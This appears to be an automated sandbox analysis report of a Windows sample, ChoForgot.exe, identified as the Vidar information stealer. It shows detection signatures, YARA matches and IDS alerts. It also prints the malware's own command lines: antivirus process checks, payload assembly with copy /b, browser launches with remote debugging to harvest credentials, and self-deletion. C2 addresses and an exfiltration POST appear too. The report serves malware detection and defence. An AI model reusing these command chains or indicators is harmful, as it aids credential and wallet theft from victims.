Windows Analysis Report
ChoForgot.exe

Overview

General Information

Sample name: ChoForgot.exe
Analysis ID: 1579962
MD5: 06342512b7bcdfdda8d6ea8e2d5a24e4
SHA1: 5a656ac27d5a03ee63f08dd499bacd01e0a12c3f
SHA256: 89b55665c76315777e1f2a9a5be784fd2590b917388f657c6f5c2caa055e87c2
Tags: exeuser-Brad_malware
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Maps a DLL or memory area into another process
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ChoForgot.exe (PID: 1292 cmdline: "C:\Users\user\Desktop\ChoForgot.exe" MD5: 06342512B7BCDFDDA8D6EA8E2D5A24E4)
    • cmd.exe (PID: 4144 cmdline: "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6684 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2128 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7036 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5424 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2680 cmdline: cmd /c md 623615 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 2752 cmdline: extrac32 /Y /E Distances MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 2136 cmdline: findstr /V "Duck" Ix MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1948 cmdline: cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Wb.com (PID: 2744 cmdline: Wb.com f MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 6064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 5648 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2220,i,9483855011008134585,3632144003053426118,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • msedge.exe (PID: 6780 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
          • msedge.exe (PID: 1292 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2552,i,9281795013285619816,5937589130455718843,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
        • cmd.exe (PID: 7380 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\MO8GVA1VKF37" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 5976 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 6568 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 3084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7132 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 5660 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6584 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 7416 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 7452 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • msedge.exe (PID: 7692 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6896 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0000000C.00000003.2355126342.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0000000C.00000003.2354948680.0000000001C70000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0000000C.00000003.2354981968.0000000004C0A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
12.2.Wb.com.3d0000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
12.2.Wb.com.3d0000.0.unpack | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io
                • 0x2068c:$str01: MachineID:
                • 0x1f051:$str02: Work Dir: In memory
                • 0x206c3:$str03: [Hardware]
                • 0x20675:$str04: VideoCard:
                • 0x1fce5:$str05: [Processes]
                • 0x1fcf1:$str06: [Software]
                • 0x1f1bb:$str07: information.txt
                • 0x20398:$str08: %s\*
                • 0x203e5:$str08: %s\*
                • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x1fb61:$str12: UseMasterPassword
                • 0x206cf:$str13: Soft: WinSCP
                • 0x2016e:$str14: <Pass encoding="base64">
                • 0x206b2:$str15: Soft: FileZilla
                • 0x1f1ad:$str16: passwords.txt
                • 0x1fb8c:$str17: build_id
                • 0x1fc80:$str18: file_data

                System Summary

                Source: Process started | Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Wb.com f, ParentImage: C:\Users\user\AppData\Local\Temp\623615\Wb.com, ParentProcessId: 2744, ParentProcessName: Wb.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6064, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                Source: Process started | Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4144, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5424, ProcessName: findstr.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-23T17:14:36.748679+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 188.245.216.205 | 443 | 192.168.2.6 | 49777 | TCP
                2024-12-23T17:14:39.044497+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 188.245.216.205 | 443 | 192.168.2.6 | 49784 | TCP
                2024-12-23T17:14:36.748415+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.6 | 49777 | 188.245.216.205 | 443 | TCP
                2024-12-23T17:14:32.128190+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49765 | 188.245.216.205 | 443 | TCP

                AV Detection

                Source: 0000000C.00000003.2355126342.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.9% probability
                Source: ChoForgot.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknown | HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49726 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49752 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49757 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.6:49759 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49798 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49932 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50046 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50120 version: TLS 1.2
                Source: ChoForgot.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\ChoForgot.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\ChoForgot.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com | Code function: 12_2_0101DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0101DC54
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com | Code function: 12_2_0102A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0102A1E2
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com | Code function: 12_2_0102A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0102A087
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com | Code function: 12_2_0102A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_0102A570
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com | Code function: 12_2_0101E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_0101E472
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com | Code function: 12_2_00FEC622 FindFirstFileExW,12_2_00FEC622
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com | Code function: 12_2_010266DC FindFirstFileW,FindNextFileW,FindClose,12_2_010266DC
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com | Code function: 12_2_01027333 FindFirstFileW,FindClose,12_2_01027333
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com | Code function: 12_2_010273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_010273D4
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com | Code function: 12_2_0101D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0101D921
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\623615\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\623615
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
                Source: chrome.exe | Memory has grown: Private usage: 12MB later: 30MB

                Networking

                Source: Network traffic | Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.6:49777 -> 188.245.216.205:443
                Source: Network traffic | Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.6:49765 -> 188.245.216.205:443
                Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.6:49777
                Source: Network traffic | Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.6:49784
                Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global traffic | HTTP traffic detected:
                    GET /k04ael HTTP/1.1
                    Host: t.me
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: Joe Sandbox View | IP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox View | IP Address: 108.139.47.50 108.139.47.50
                Source: Joe Sandbox View | IP Address: 162.159.61.3 162.159.61.3
                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknown | TCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com | Code function: 12_2_0102D95F InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,12_2_0102D95F
                Source: global traffic | HTTP traffic detected:
                    GET / HTTP/1.1
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: bijutr.shop
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b?rn=1734970511307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=264DEDAF8CF36A9502DCF8F18D816BBC&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b2?rn=1734970511307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=264DEDAF8CF36A9502DCF8F18D816BBC&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=11521cea2404b69b6674da71734970511; XID=11521cea2404b69b6674da71734970511
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734970511306&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=07175bb318f0456c974d87721f0f67b4&activityId=07175bb318f0456c974d87721f0f67b4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=6E60CE8AF10C41EC8044A9E776F1DAF3&MUID=264DEDAF8CF36A9502DCF8F18D816BBC HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1; SM=T
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.dr | String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: 000003.log6.22.dr | String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                Source: 000003.log6.22.dr | String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                Source: 000003.log6.22.dr | String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp
                    String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp
                    String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2638622459.000047E4002D0000.00000004.00000800.00020000.00000000.sdmp
                    String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: global traffic
                    DNS traffic detected: DNS query: jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx
                Source: global traffic
                    DNS traffic detected: DNS query: t.me
                Source: global traffic
                    DNS traffic detected: DNS query: bijutr.shop
                Source: global traffic
                    DNS traffic detected: DNS query: www.google.com
                Source: global traffic
                    DNS traffic detected: DNS query: ntp.msn.com
                Source: global traffic
                    DNS traffic detected: DNS query: bzib.nelreports.net
                Source: global traffic
                    DNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global traffic
                    DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global traffic
                    DNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global traffic
                    DNS traffic detected: DNS query: assets.msn.com
                Source: global traffic
                    DNS traffic detected: DNS query: c.msn.com
                Source: global traffic
                    DNS traffic detected: DNS query: api.msn.com
                Source: global traffic
                    DNS traffic detected: DNS query: deff.nelreports.net
                Source: unknown
                    HTTP traffic detected: POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----ZM790RIWTRQIE37YCBIM
